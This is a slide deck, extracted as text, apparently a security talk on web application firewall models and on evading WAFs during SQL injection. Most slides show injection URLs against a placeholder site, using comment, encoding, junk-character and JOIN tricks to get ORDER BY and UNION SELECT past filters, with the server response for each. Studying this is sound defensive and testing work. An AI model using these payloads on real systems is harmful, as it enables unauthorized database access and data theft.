Professional Documents
Culture Documents
Pros:
Less time to implement.
Cons:
Less protection.
Positive Model
A positive security model enforces positive behaviour by learning the application logic and the
building a security policy of valid known requests as a user interacts with the application.
Example:
Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until
65535.
Using intval conditions on page. (Accepts only integers)
Pros:
Better performance (less rules).
Less false positives.
Cons:
Much more time to implement.
Some vendors provide automatic learning mode, they help, but are far from perfect,
in the end, you always need a skilled human to review the policies
Mix Model
Request:
Fingerprinting WAF
Request and Response for ModSecurity Firewall
Response:
Fingerprinting WAF
Response for WebKnight Firewall
Response:
Fingerprinting WAF
Response for WebKnight Firewall
Using WaFw00f.py
https://abc.com/index.php?id=1
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '1 ' at line 6
https://abc.com/index.php?id=1
HTTP/1.1 403 Forbidden Error
Or
HTTP/1.1 406 Not Acceptable
or
HTTP/1.1 404 Not Found
Or
HTTP/1.1 500 Internal Server Error
Or
HTTP/1.1 400 Bad Request
Some recon on WAF
https://abc.com/index.php?
id=1
HTTP/1.1 200 OK
Assumptions in mind
Order keyword is Blocked ??
Order by keyword is Blocked ??
Any other alternative of Order by query ??
Does Spaces are blocked
Lets Try
https://abc.com/index.php? %27 ORDER %23
id=1
HTTP/1.1 403 Forbidden
Assumptions in mind
Order keyword is Blocked
Check again order is blocked ??
https://abc.com/index.php? %27ORDER%23
id=1
HTTP/1.1 200 OK
New Assumptions in mind
Order keyword is not Blocked
What is blocked then ???
No Assumptions in mind
Using combination of inline comments, URL encoding & Junk Characters instead
of spaces like:
Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
Techniques to bypass spaces
Query will be
ORDER%0aby%0a1
ORDER%0bby%0b1
ORDER%0cby%0c1
ORDER%0Dby%0D1
ORDER%A0by%A01
ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php? %27/**/ORDER/**/by/**/1%2
id=1 3
HTTP/1.1 200 OK
Assumptions in mind
Spaces are Blocked ??
https://abc.com/index.php? %27/**/UNION/**/SELECT/**/1,2,3%23
id=1
HTTP/1.1 403 Forbidden
Assumptions in mind
Spaces were bypassed using inline
comments..Still blocked???
UNION keyword is blocked ??
SELECT keyword is blocked ??
Intergers are blocked ??
Commas are blocked ?
Combination of UNION SELECT is blocked
SELECT with Integers are blocked
Techniques to Bypass
If UNION is blocked
%53nion
%2553nion
%55%4e%49%4f%4e (UNION) Triple URL Encoding
https://abc.com/index.php? %27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!%55NION*//**/SELECT/**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
id=1
Assumptions in mind
UNION keyword is blocked ??
SELECT keyword is blocked ??
Intergers are blocked ??
Commas are blocked ?
Combination of UNION SELECT is blocked
SELECT with Integers are blocked
https://abc.com/index.php? %27/**//*!50000UNION*/1,2,3%23
id=1
HTTP/1.1 200 OK
https://abc.com/index.php? %27/**//*!50000SELECT*/1,2,3%23
id=1
HTTP/1.1 200 OK
Assumptions in mind
UNION keyword is NOT blocked.
SELECT keyword is NOT blocked.
Intergers are NOT blocked
Commas are NOT blocked
Combination of UNION SELECT is blocked ?
SELECT with Integers are NOT blocked
Techniques to bypass combination of union select
Using combination of inline comments and URL encoding :
/*!50000%55niOn*/ /*!50000%53eLECT*/
Union%23%0aSELECT
Union%23%0bSELECT
Union%23%0cSELECT
Union%23%0DSELECT
Union%23%A0SELECT
UNION
%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Some time need to increase the junk as per the requirement
UNION
%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Techniques to bypass combination of union select
Using Distinct statement
Assumptions in mind
UNION keyword is NOT blocked.
SELECT keyword is NOT blocked.
Intergers are NOT blocked
Commas are blocked
Combination of UNION SELECT is NOT
blocked ?
SELECT with Integers are NOT blocked
SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
Advance way to bypass Commas
https://abc.com/index.php? %27/**/UNION/**/SELECT/**/*/**/FROM/**/
id=1 (SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23
HTTP/1.1 200 OK
Similar Approach for other Vulnerabilities
For XSS
For LFI / RFI
DEMO TIME
References
Images in slides 10,11,14,15,16,17 Taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Byp
assing_By_RAFAYBALOCH.pdf
Thank
you..!